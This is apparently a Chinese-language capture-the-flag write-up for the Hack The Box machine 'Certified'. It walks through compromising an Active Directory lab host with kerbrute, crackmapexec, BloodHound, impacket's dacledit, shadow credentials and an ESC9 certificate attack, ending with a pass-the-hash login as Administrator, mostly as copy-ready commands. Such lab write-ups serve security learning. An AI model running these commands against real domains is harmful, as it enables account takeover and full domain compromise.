HTB_Certified
windows(Med)
sudo nmap -sS -p---min-rate 10000-Pn10.10.11.41
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
9389/tcp open adws
cat1| grep tcp | awk -F '/''{printf $1","}'
sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,9389,49666,49668,49669,49670,49677,49705,49727,55039-sCV -Pn10.10.11.41
粗看一下,没有web端口,嘶,但有域
139,445端口先smb服务看看
enum4linux -a 10.10.11.41 #
可空会话登录
smbclient --no-pass -L //10.10.11.41 #无果
看样子离不开枚举了
88端口呢,枚举可能的用户名
./kerbrute_linux_amd64 userenum --dc certified.htb -d certified.htb /usr/share/seclists/usernames_10m.txt
说实话,跑的比较久,最后得到的是judith.mader
,继续爆破密码
sudo crackmapexec smb 10.10.11.41 --users -u judith.made -p /usr/share/wordlists/rockyou.txt
得到 judith09
这个是频道里的师傅直接给的,在我看来,应该是这种方式得到的
现在枚举查看文件
smbclient -U 'judith.mader%judith09' -L //10.10.11.41
但是 failed (Error NT_STATUS_IO_TIMEOUT)
有时候是给的响应是
Error NT_STATUS_RESOURCE_NAME_NOT_FOUND
Unable to connect with SMB1 -- no workgroup available
但是crackmapexec明显说这个凭证可以
sudo crackmapexec smb 10.10.11.41 --users -u judith.mader -p judith09 --shares #
确定shares只有读权限
sudo crackmapexec smb 10.10.11.41 --users -u judith.mader -p judith09 --rid-brute #爆破其它账户
发现了几个额外用户如:gregory、harry和management_svc
既然有了凭证,试试winrm无果(废话,都没有相关服务)
试试ldap
ldapdomaindump 10.10.11.41 -u 'certified.htbjudith.mader' -p 'judith09'
查看 domain_users.html
,没给密码信息
那对于manage*这个用户,密码也要继续爆破?先用crackmapexec爆着吧,没结果
为了解决smbclient的登录问题,发现了这个https://forum.hackthebox.com/t/starting-box-nt-status-resource-name-not-found/2757/8
发现去掉 -L命令就可以
smbclient -N //10.10.11.41/C$
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
smbclient -U 'judith.mader%judith09' //10.10.11.41/SYSVOL #没发现什么有用的
像ADMIN$、C$是拒绝,IPC$、NETLOGON没东西,
那这个judith的凭证还能做什么呢
远程bloodHound
python ~/htb/tools/Blood*/bloodhound.py -d certified.htb -u judith.mader -p judith09 -gc certified.htb -c all -ns 10.10.11.41
zip -ur 1.zip ./*.json
启动neo4j console->bloodhound分析一下
https://xz.aliyun.com/t/14499
这算是一条完整的链了,judith对management组有WriteOwner
权限,而management组可以 GenericWrite
management_svc域成员,svc呢,可以 CanPsRemote
到DC01,
这里看能否先获得judith的shell?
https://xz.aliyun.com/t/11877 impacket用法
impacket-psexec certified.htb/judith.mader:[email protected]
但是呢,共享文件夹都不可写
那这个凭证还能干什么,搜对应权限能干什么
https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse
找到了一个certypy命令,枚举和滥用AD证书的
certipy-ad find -vulnerable -u [email protected] -p judith09 -dc-ip 10.10.11.41
但是得到的json文件说 [!] Could not find any certificate templates
,没洞,那就意味着下面这个命令用不了
certipy-ad req -username [email protected] -password judith09 -target-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'ESC1' -upn '[email protected]'
下面的命令也不行
xfreerdp /u:JUDITH.MADER /p:"judith09" /v:10.10.11.41
rpcclient -U "judith.mader%judith09" 10.10.11.41
#Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
????不是,哥们?
https://www.thehacker.recipes/ad/movement/dacl/
DACLs (Active Directory Discretionary Access Control Lists) are lists made of ACEs (Access Control Entries) that identify the users and groups that are allowed or denied access on an object. SACLs (Systems Access Control Lists) define the audit and monitoring rules over a securable object.
既然有 Writeowner
权限,可以间接地有 writedacl
权限
https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/acl-persistence-abuse
https://github.com/fortra/impacket/blob/master/examples/dacledit.py
可以直接下载,但我只复制了两个文件过去
┌──(kali㉿xinGuang)-[/usr/lib/python3/dist-packages/impacket]
└─$ sudo cp ~/htb/tools/msada_guids.py msada_guids.py
https://exploit-notes.hdks.org/exploit/windows/active-directory/dacl-attack/
python ~/htb/tools/dacledit.py -action read -target management -principal judith.mader -dc-ip 10.10.11.41 certified.htb/judith.mader:judith09
python ~/htb/tools/dacledit.py -action write -rights 'FullControl' -principal judith.mader -target management -inheritance -dc-ip 10.10.11.41 certified.htb/judith.mader:judith09 -use-ldaps
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
需要同步系统时间
https://worktile.com/kb/ask/342992.html
sudo apt-get install ntpdate
sudo ntpdate 10.10.11.41
再运行下上面的dacledit命令
#[*] DACL modified successfully!
#就是修改它的权限变成FullControl#再查看一下
python ~/htb/tools/dacledit.py -action read -target management -principal judith.mader -dc-ip 10.10.11.41 certified.htb/judith.mader:judith09
但是第二天再运行以上命令已经不成功了,都报错为:INSUFF_ACCESS_RIGHTS
反正我是重置机器了,才可以
python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl -principal judith.mader -target management -inheritance -use-ldaps -k -dc-ip 10.10.11.41
https://xz.aliyun.com/t/12462 讲到了一个targetedKerberoast
技术,搜索这个呢,类似的命令如下:它仅利用了这个账户配置了一个SPN,和随便一个普通域用户凭证即可
impacket-GetUserSPNs certified.htb/judith.mader:judith09 -request-user management_svc
获得了svc的hashes.asreproast
https://www.cnblogs.com/nice0e3/p/15784113.html
可以将内容全部复制下来,尝试破解一下
hashcat64.exe -m 13100 --force -a 0 test.txt rockyou.txt
好的,破不了,但是至少获得了SPN为:certified.htb/management_svc.DC01
RBCD尝试(不可行)
这一块是单纯的过程记录可跳过,实际有效步骤在ADCS篇
那这走不通
后来发现judith是可以用rpcclient的,之前登不上可能是命令不对。。。
rpcclient -U "judith.mader%judith09" 10.10.11.41
那这个怎么利用,也就能查看域信息什么的
>enumdomgroups # group:[Management] rid:[0x450]
>querydispinfo #judith RID: 0x44f , svc RID: 0x451
> queryusergroups 0x451 #450 201
> queryusergroups 0x44f #201
这里主要是更加确认了,需要添加judith到management组才能对svc有所操作
https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html
https://www.thehacker.recipes/ad/movement/dacl/addmember
net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41
https://www.freebuf.com/articles/network/385993.html
https://abrictosecurity.com/pentesting-active-directory-certificate-services-adcs-esc1-esc8/
net rpc password "management_svc" -U "certified.htb/judith.mader%judith09" -S "10.10.11.41" #改密码权限不够,必须要GenericAll
后面经过一番查询,对于Genericwrite权限, 可以用RBCD
https://exploit-notes.hdks.org/exploit/windows/active-directory/resource-based-constrained-delegation-attack/
那么整个命令就是这样子
python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl-principal judith.mader -target management -inheritance -use-ldaps -k -dc-ip 10.10.11.41;net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41;impacket-addcomputer -computer-name 'FAKECOMPUTER1$'-computer-pass 'password123'-dc-ip 10.10.11.41 certified.htb/judith.mader:judith09;impacket-rbcd -delegate-from 'FAKECOMPUTER1$'-delegate-to 'management_svc'-dc-ip 10.10.11.41-action 'write''certified.htb/judith.mader:judith09';impacket-getST -spn 'certified.htb/management_svc.DC01'-impersonate management_svc -dc-ip 10.10.11.41'certified.htb/FAKECOMPUTER1$:password123'
export KRB5CCNAME=`pwd`/[email protected][email protected]
klist
impacket-wmiexec certified.htb/[email protected] -k -no-pass
impacket-psexec -k -no-pass certified.htb/[email protected]
impacket-secretsdump certified.htb/[email protected] -k -no-pass
好,最后确认了一下,这步也行不通
ADCS利用
回到开头,即,将judith加入到management组这一步肯定没问题
https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse-with-certipy 这篇文章的ESC9利用部分,certipy-ad shadow
sudo ntpdate 10.10.11.41;python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl -principal judith.mader -target management -inheritance -use-ldaps -dc-ip 10.10.11.41;net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41;certipy-ad shadow auto -username [email protected] -password judith09 -account management_svc
这样就得到了svc的hash
evil-winrm
登录不上,psexec也不行,那无所谓,反正现在可以换management_svc用户来了,继续根据ESC9的利用步骤来,因为时间长了有的命令会失效,所以一次性梭哈
python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl -principal judith.mader -target management -inheritance -use-ldaps -dc-ip 10.10.11.41;net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41;certipy-ad shadow auto -username [email protected] -password judith09 -account management_svc;certipy-ad account update -username [email protected] -password judith09 -user management_svc -upn Administrator;certipy-ad req -username [email protected] -hashes a091?584 -ca certified-DC01-CA -template ESC9;certipy-ad account update -username [email protected] -password judith09 -user management_svc -upn [email protected];certipy-ad auth -pfx adminitrator.pfx -domain certified.htb
但是最后停留到倒数第二步,[-] Failed to request certificate
(其实用svc进行certipy-ad find时是没有模板的)
那应该不是走这一步,回到bloodhound这个页面,发现svc和CA_OPERATOR有关系,继续查看,满足这个
management_svc
对ca_operator
有 GenericAll权限;
看看ca_operator的hash
certipy-ad shadow auto -username [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
看看证书模板,好吧,ca才可以这样利用
certipy-ad find -vulnerable -u [email protected] -hashes a.. -dc-ip 10.10.11.41 #
没有
certipy-ad find -vulnerable -u [email protected] -hashes b4b86????2 -dc-ip 10.10.11.41 #这个有,ESC9
所以,按照ESC9走一遍就好了:
certipy-ad account update -u [email protected] -hashes a091???4 -user ca_operator -upn Administrator;certipy-ad req -u [email protected] -hashes b4b86f45???2 -ca certified-DC01-CA -template ESC9;certipy-ad account update -username [email protected] -hashes a091c1???5584 -user ca_operator -upn [email protected];certipy-ad auth -pfx administrator.pfx -domain certified.htb
嘶,失败
最后,J师傅提示说,模板名可以改一改
certipy-ad req -u [email protected] -hashes b4b86???8f2 -ca certified-DC01-CA -template CertifiedAuthentication;
这个很奇怪,当上一条命令是-upn Administrator的时候就报错
The NETBIOS connection with the remote host timed out.
重启了几次靶机
又单独试了试
certipy-ad req -u [email protected] -hashes b4b8???f2 -ca certified-DC01-CA -template CertifiedAuthentication
这个时候,保存的是ca_operator的pfx
再次执行下面这个,突然又可以了
certipy-ad account update -u [email protected] -hashes a091????5584 -user ca_operator -upn Administrator;certipy-ad req -u [email protected] -hashes b4b?8???d8f2 -ca certified-DC01-CA -template CertifiedAuthentication;certipy-ad account update -username [email protected] -hashes a091c???584 -user ca_operator -upn [email protected];certipy-ad auth -pfx administrator.pfx -domain certified.htb
最终得到administrator的hash
最后登录即可,利用的是139、445端口,smb服务
impacket-psexec certified.htb/[email protected] -hashes aaaa:0???2d34
总结
多学学AD总能学到新东西
user.txt:
1.88端口利用,枚举用户名,crackmapexec爆破密码
2.bloodhound分析各成员关系
3.添加judith用户到management组 (WriteOwner)->获得对svc用户的Genericwrite权限
4.certipy shadow获取svc的hash
root.txt:
1.certipy find 无果->bloodhound进一步发现svc对ca_operator有 GenericAll
权限
2.获得ca_operator hash->利用ADCS(ESC9)得到administrator_hash
3.smb服务利用并登录
利用初始凭证通过bloodhound分析,根据成员间的权限,充分利用
主要是dacledit、certipy的工具利用,以及各种参考文章都写好了的(但我不会就是不会)
GenericWrite
权限,可以通过证书呢,获取对象的哈希,certipy
1.为什么有时候dacledit进行FullControll设置会失败,judith成员对management组怎么会没有权限呢
A:多重置几次靶机
2.上述做法背后的原理对我来讲比较复杂,这里就不瞎分析了
参考
wp:师傅们探讨时留下的蛛丝马迹+J师傅提示
dacl有关:https://book.hacktricks.xyz/cn/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces
dacledit脚本:https://github.com/fortra/impacket/blob/master/examples/dacledit.py
certipy利用:https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse-with-certipy
ADCS利用:https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse-with-certipy
bloodhound脚本获取域成员信息:
https://github.com/dirkjanm/BloodHound.py
BloodHound界面分析:
https://xz.aliyun.com/t/14499
https://www.freebuf.com/articles/web/288370.html
sudo apt-get install bloodhound
sudo neo4j console
访问http://localhost:7474/browser/,默认凭证为:neo4j:neo4j
neo4j123
服务端算是启动完毕,新开窗口输入bloodhound
zip -ur 1.zip ./*.json
upload压缩包即可
另外如果neo4j没有正确退出的话,再次启动可能出现Neo4j已经运行的消息,使用 sudo neo4j stop
退出也会超时,干脆重启机器
SPN利用原理 https://xz.aliyun.com/t/12998
远程加组:
https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html
https://www.thehacker.recipes/ad/movement/dacl/addmember
同步系统时间 https://worktile.com/kb/ask/342992.html
sudo apt-get install ntpdate
sudo ntpdate 10.10.11.41
原文始发于微信公众号(羽泪云小栈):HTB_Certified
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论